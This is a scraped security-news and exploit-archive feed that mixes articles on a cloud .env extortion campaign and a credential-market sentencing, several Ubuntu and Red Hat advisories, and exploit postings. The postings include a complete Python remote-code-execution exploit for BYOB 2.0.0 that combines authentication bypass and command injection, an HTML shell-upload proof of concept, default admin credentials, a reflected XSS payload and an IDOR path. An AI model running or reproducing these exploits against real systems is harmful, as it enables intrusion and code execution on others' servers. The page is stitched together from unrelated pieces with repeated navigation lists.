A large-scale extortion campaign has compromised various organizations by taking advantage of publicly accessible environment variable files (.env) that contain credentials associated with cloud and social media applications.
"Multiple security missteps were present in the course of this campaign, including the following: Exposing environment variables, using long-lived credentials, and absence

Cloud Security / Application Security

A large-scale extortion campaign has compromised various organizations by taking advantage of publicly accessible environment variable files (.env) that contain credentials associated with cloud and social media applications.

"Multiple security missteps were present in the course of this campaign, including the following: Exposing environment variables, using long-lived credentials, and absence of least privilege architecture," Palo Alto Networks Unit 42 said in a Thursday report.

The campaign is notable for setting its attack infrastructure within the infected organizations' Amazon Web Services (AWS) environments and using them as a launchpad for scanning more than 230 million unique targets for sensitive data.

With 110,000 domains targeted, the malicious activity is said to have netted over 90,000 unique variables in the .env files, out of which 7,000 belonged to organizations' cloud services and 1,500 variables are linked to social media accounts.

"The campaign involved attackers successfully ransoming data hosted within cloud storage containers," Unit 42 said. "The event did not include attackers encrypting the data before ransom, but rather they exfiltrated the data and placed the ransom note in the compromised cloud storage container."

The most striking aspect of the attacks is that it doesn't rely on security vulnerabilities or misconfigurations in cloud providers' services, but rather stems from the accidental exposure of .env files on unsecured web applications to gain initial access.

A successful breach of a cloud environment paves the way for extensive discovery and reconnaissance steps with an aim to broaden their foothold, with the threat actors weaponizing AWS Identity and Access Management (IAM) access keys to create new roles and escalate their privileges.

The new IAM role with administrative permissions is then used to create new AWS Lambda functions to initiate an automated internet-wide scanning operation containing millions of domains and IP addresses.

"The script retrieved a list of potential targets from a publicly accessible third-party S3 bucket exploited by the threat actor," Unit 42 researchers Margaret Zimmermann, Sean Johnstone, William Gamazo, and Nathaniel Quist said.

"The list of potential targets the malicious lambda function iterated over contained a record of victim domains. For each domain in the list, the code performed a cURL request, targeting any environment variable files exposed at that domain, (i.e., https://<target>/.env)."

Should the target domain host an exposed environment file, the cleartext credentials contained within the file are extracted and stored in a newly created folder within another threat actor-controlled public AWS S3 bucket. The bucket has since been taken down by AWS.

The attack campaign has been found to specifically single out instances where the .env files contain Mailgun credentials, indicating an effort on the part of the adversary to leverage them for sending phishing emails from legitimate domains and bypass security protections.

The infection chain ends with the threat actor exfiltrating and deleting sensitive data from the victim's S3 bucket, and uploading a ransom note that urges them to contact and pay a ransom to avoid selling the information on the dark web.

The financial motivations of the attack are also evident in the threat actor's failed attempts to create new Elastic Cloud Compute (EC2) resources for illicit cryptocurrency mining.

It's currently not clear who is behind the campaign, in part due to the use of VPNs and the TOR network to conceal their true origin, although Unit 42 said it detected two IP addresses that were geolocated in Ukraine and Morocco as part of the lambda function and S3 exfiltration activities, respectively.

"The attackers behind this campaign likely leveraged extensive automation techniques to operate successfully and rapidly," the researchers said. "This indicates that these threat actor groups are both skilled and knowledgeable in advanced cloud architectural processes and techniques."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Attackers Exploit Public .env Files to Breach Cloud and Social Media Accounts

Ubuntu Security Notice 6963-1 - It was discovered that GNOME Shell incorrectly opened the portal helper automatically when detecting a captive network portal. A remote attacker could possibly use this issue to load arbitrary web pages containing JavaScript, leading to resource consumption or other attacks.

==========================================================================  
Ubuntu Security Notice USN-6963-1  
August 15, 2024

gnome-shell vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

GNOME Shell could allow unintended access to network services.

Software Description:  
- gnome-shell: graphical shell for the GNOME desktop

Details:

It was discovered that GNOME Shell incorrectly opened the portal helper  
automatically when detecting a captive network portal. A remote attacker  
could possibly use this issue to load arbitrary web pages containing  
JavaScript, leading to resource consumption or other attacks.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   gnome-shell                     46.0-0ubuntu6~24.04.3

Ubuntu 22.04 LTS  
   gnome-shell                     42.9-0ubuntu2.2

Ubuntu 20.04 LTS  
   gnome-shell                     3.36.9-0ubuntu0.20.04.4

After a standard system update you need to restart your session to make all  
the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6963-1  
   CVE-2024-36472

Package Information:  
   https://launchpad.net/ubuntu/+source/gnome-shell/46.0-0ubuntu6~24.04.3  
   https://launchpad.net/ubuntu/+source/gnome-shell/42.9-0ubuntu2.2  
   https://launchpad.net/ubuntu/+source/gnome-shell/3.36.9-0ubuntu0.20.04.4

Ubuntu Security Notice USN-6963-1

Build Your Own Botnet (BYOB) version 2.0.0 exploit that works by spoofing an agent callback to overwrite the sqlite database and bypass authentication and exploiting an authenticated command injection in the payload builder page.

    # Exploit Title: BYOB (Build Your Own Botnet) v2.0.0 Unauthenticated RCE (Remote Code Execution)# Date: 2024-08-14# Exploit Author: @_chebuya# Software Link: https://github.com/malwaredllc/byob# Version: v2.0.0# Tested on: Ubuntu 22.04 LTS, Python 3.10.12, change numpy==1.17.3->numpy# CVE: CVE-2024-?????, CVE-2024-?????# Description: This exploit works by spoofing an agent callback to overwrite the sqlite database and bypass authentication, then exploiting an authenticated command injection in the payload builder page# Github: # Blog: import sysimport jsonimport base64import stringimport randomimport argparseimport requestsfrom bs4 import BeautifulSoupdef get_csrf(session, url):    r = session.get(url)    soup = BeautifulSoup(r.text, 'html.parser')    csrf_token = soup.find('input', {'name': 'csrf_token'})['value']    return csrf_tokendef upload_database(session, url, filename):    with open('database.db', 'rb') as f:        bindata = f.read()    data = base64.b64encode(bindata).decode('ascii')    json_data = {'data': data, 'filename': filename, 'type': "txt", 'owner': "admin", "module": "icloud", "session": "lol"}    headers = {        'Content-Length': str(len(json.dumps(json_data)))    }    print("[***] Uploading database")    upload_response = session.post(f"{url}/api/file/add", data=json_data, headers=headers)    print(upload_response.status_code)    return upload_response.status_codedef exploit(url, username, password, user_agent, command):    s = requests.Session()    # This is to ensure reliability, as the application cwd might change depending on the stage of the docker run process    filepaths = ["/proc/self/cwd/buildyourownbotnet/database.db", "/proc/self/cwd/../buildyourownbotnet/database.db", "/proc/self/cwd/../../../../buildyourownbotnet/database.db", "/proc/self/cwd/instance/database.db", "/proc/self/cwd/../../../../instance/database.db", "/proc/self/cwd/../instance/database.db"]    failed = True    for filepath in filepaths:        if upload_database(s, url, filepath) != 500:            failed = False            break    if failed:        print("[!!!] Failed to upload database, exiting")        sys.exit(1)    if password is None:        password = ''.join([random.choice(string.ascii_uppercase + string.digits) for _ in range(32)])    print(username + ":" + password)    register_csrf = get_csrf(s, f'{url}/register')    headers = {        'User-Agent': user_agent,        'Content-Type': 'application/x-www-form-urlencoded',    }    data = {        'csrf_token': register_csrf,        'username': username,        'password': password,        'confirm_password': password,        'submit': 'Sign Up'    }    print("[***] Registering user   ")    regsiter_response = s.post(f'{url}/register', headers=headers, data=data)    print(regsiter_response.status_code)    login_csrf = get_csrf(s, f'{url}/login')    data = {        'csrf_token': login_csrf,        'username': username,        'password': password,        'submit': 'Log In'    }    print("[***] Logging in")    login_response = s.post(f'{url}/login', headers=headers, data=data)    print(login_response.status_code)    headers = {        'User-Agent': user_agent,        'Content-Type': 'application/x-www-form-urlencoded',    }    data = f'format=exe&operating_system=nix$({command})&architecture=amd64'    try:        s.post(f'{url}/api/payload/generate', headers=headers, data=data, stream=True, timeout=0.0000000000001)    except requests.exceptions.ReadTimeout:        passparser = argparse.ArgumentParser()parser.add_argument("-t", "--target", help="The target URL of the BYOB admin panel", required=True)parser.add_argument("-u", "--username", help="The username to set for the new admin account", default='admin')parser.add_argument("-p", "--password", help="The password to set for the new admin account", default=None)parser.add_argument("-A", "--user-agent", help="The user-agent to use for requests", default='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36')parser.add_argument("-c", "--command", help="The command to execute on the BYOB server", required=True)args = parser.parse_args()exploit(args.target.rstrip("/"), args.username, args.password, args.user_agent, args.command)

Build Your Own Botnet 2.0.0 Remote Code Execution

Red Hat Security Advisory 2024-5322-03 - An update for firefox is now available for Red Hat Enterprise Linux 9. Issues addressed include bypass, out of bounds read, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5322.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:5322-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5322  
Issue date:         2024-08-15  
Revision:           03  
CVE Names:          CVE-2024-7518  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

Security Fix(es):

* Firefox: 115.14/128.1 ESR ()

* mozilla: Fullscreen notification dialog can be obscured by document content (CVE-2024-7518)

* mozilla: Out of bounds memory access in graphics shared memory handling (CVE-2024-7519)

* mozilla: Type confusion in WebAssembly (CVE-2024-7520)

* mozilla: Incomplete WebAssembly exception handing (CVE-2024-7521)

* mozilla: Out of bounds read in editor component (CVE-2024-7522)

* mozilla: CSP strict-dynamic bypass using web-compatibility shims (CVE-2024-7524)

* mozilla: Missing permission check when creating a StreamFilter (CVE-2024-7525)

* mozilla: Uninitialized memory used by WebGL (CVE-2024-7526)

* mozilla: Use-after-free in JavaScript garbage collection (CVE-2024-7527)

* mozilla: Use-after-free in IndexedDB (CVE-2024-7528)

* mozilla: Document content could partially obscure security prompts (CVE-2024-7529)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-7518

References:

https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-5322-03

Hotel Booking System version 1.0 suffers from a remote shell upload vulnerability.

=============================================================================================================================================  
| # Title     : Hotel Booking System 1.0 Remote File Upload Vulnerability                                                                   |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel.zip                                             |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely upload malicious PHP files directly.

[+] Line 9 set url of target.

[+] The path to upload the files : http://127.0.0.1/hotel/uploadImage\Profile

[+] Save Code as html :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Image Upload Form</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/source%20code/profile.php" method="POST" enctype="multipart/form-data">  
        <label for="image">Upload an image:</label>  
        <input type="file" id="image" name="image" accept="image/*" required>  
        <button type="submit" name="btn_update">Upload</button>  
    </form>  
</body>  
</html>

[+] part 2 : infected item ( manage_website.php ) .

[+] Line 9 set url of target.

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Update Website Images</title>  
</head>  
<body>  
    <form action="http://127.0.0.1/source%20code/manage_website.php" method="POST" enctype="multipart/form-data">  
        <input type="hidden" name="old_website_image" value="current_website_image.jpg">  
        <label for="website_image">Upload new website image:</label>  
        <input type="file" id="website_image" name="website_image" accept="image/*">

                <input type="hidden" name="old_login_image" value="current_login_image.jpg">  
        <label for="login_image">Upload new login image:</label>  
        <input type="file" id="login_image" name="login_image" accept="image/*">

                <input type="hidden" name="old_back_login_image" value="current_back_login_image.jpg">  
        <label for="back_login_image">Upload new back login image:</label>  
        <input type="file" id="back_login_image" name="back_login_image" accept="image/*">

                <button type="submit" name="btn_web">Update Images</button>  
    </form>  
</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Hotel Booking System 1.0 Shell Upload

Home Owners Collection Management System version 1.0 suffers from an ignored default credential vulnerability.

**Home Owners Collection Management System 1.0 Insecure Settings**

Posted Aug 16, 2024

Authored by indoushka

Home Owners Collection Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 94fb8d8c82f8132953cb67c97a9b682c8e63a436a475a575173b89ddf54daa9f

Download | Favorite | View

**Home Owners Collection Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Home Owners Collection Management System v1.0 Insecure Settings Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,433)
*   Arbitrary (16,884)
*   BBS (2,859)
*   Bypass (1,865)
*   CGI (1,033)
*   Code Execution (7,817)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,088)
*   Encryption (2,389)
*   Exploit (53,217)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (897)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,665)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,612)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,999)
*   Web (9,966)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,789)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,546)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,754)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Home Owners Collection Management System 1.0 Insecure Settings

Red Hat Security Advisory 2024-5160-03 - Red Hat OpenShift Container Platform release 4.15.27 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5160.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.15.27 security update  
Advisory ID:        RHSA-2024:5160-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:5160  
Issue date:         2024-08-16  
Revision:           03  
CVE Names:          CVE-2024-6104  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.27 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.15.27. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:5163

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

Security Fix(es):

* go-retryablehttp: url might write sensitive information to log file  
(CVE-2024-6104)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating-cluster-cli.html

Solution:

CVEs:

CVE-2024-6104

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2294000  
https://issues.redhat.com/browse/OCPBUGS-33402  
https://issues.redhat.com/browse/OCPBUGS-34721  
https://issues.redhat.com/browse/OCPBUGS-37174  
https://issues.redhat.com/browse/OCPBUGS-37229  
https://issues.redhat.com/browse/OCPBUGS-37277  
https://issues.redhat.com/browse/OCPBUGS-37288  
https://issues.redhat.com/browse/OCPBUGS-37672  
https://issues.redhat.com/browse/OCPBUGS-37775  
https://issues.redhat.com/browse/OCPBUGS-37813  
https://issues.redhat.com/browse/OCPBUGS-37849  
https://issues.redhat.com/browse/OCPBUGS-37962

Red Hat Security Advisory 2024-5160-03

Giftora version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Giftora V 1.0 XSS Vulnerability                                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script                                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /search?q=1'%22()%26%25<acx><ScRiPt%20>prompt(966079)</ScRiPt>[+] save code as poc.html [+] payload : https://127.0.0.1/giftora.webister.net//search?q=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(966079)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Giftora 1.0 Cross Site Scripting

Bhojon Restaurant Management System version 3.0 suffers from an insecure direct object reference vulnerability.

**Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference**

Posted Aug 16, 2024

Authored by indoushka

Bhojon Restaurant Management System version 3.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 98c12c7a5556d4399b71f053e8f21eaf5c59e49e15d4bf7f6b1980de56fec3c2

Download | Favorite | View

**Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Bhojon restaurant management system v3.0 IDOR Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.bdtask.com/restaurant-management-system.php#live_demo                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /dashboard/autoupdate[+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdateGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,433)
*   Arbitrary (16,884)
*   BBS (2,859)
*   Bypass (1,865)
*   CGI (1,033)
*   Code Execution (7,817)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,088)
*   Encryption (2,389)
*   Exploit (53,217)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (897)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,665)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,612)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,999)
*   Web (9,966)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,789)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,546)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,754)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Bhojon Restaurant Management System 3.0 Insecure Direct Object Reference

A 27-year-old Russian national has been sentenced to over three years in prison for peddling financial information, login credentials, and other personally identifying information (PII) on a now-defunct dark web marketplace called Slilpp.
Georgy Kavzharadze, 27, of Moscow, Russia, pleaded guilty to one count of conspiracy to commit bank fraud and wire fraud earlier this February. In addition to

A 27-year-old Russian national has been sentenced to over three years in prison for peddling financial information, login credentials, and other personally identifying information (PII) on a now-defunct dark web marketplace called Slilpp.

Georgy Kavzharadze, 27, of Moscow, Russia, pleaded guilty to one count of conspiracy to commit bank fraud and wire fraud earlier this February. In addition to a 40-month jail term, Kavzharadze has been ordered to pay $1,233,521.47 in restitution.

The defendant, who went by the online monikers TeRorPP, Torqovec, and PlutuSS, is believed to have listed over 626,100 stolen login credentials for sale on Slilpp and sold more than 297,300 of them on the illicit marketplace between July 2016 and May 2021.

"Those credentials were subsequently linked to $1.2 million in fraudulent transactions," the U.S. Department of Justice (DoJ) said.

"On May 27, 2021, Kavzharadze's account on Slilpp listed 240,495 login credentials for sale that would allow the buyer to use the information to steal money from the victim's online payment and bank accounts."

Kavzharadze is estimated to have made no less than $200,000 in profits from the sale of stolen credentials. In August 2021, he was charged with conspiracy to commit bank fraud and wire fraud, bank fraud, access device fraud, and aggravated identity theft. He was subsequently extradited to the U.S. to face the charges.

Slilpp was one of the largest marketplaces that specialized in the sale of login credentials until June 2021, when its infrastructure was dismantled as part of an international law enforcement operation involving authorities from the U.S., Germany, the Netherlands, and Romania.

It had been in operation since 2012, selling more than 80 million login credentials from over 1,400 companies.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web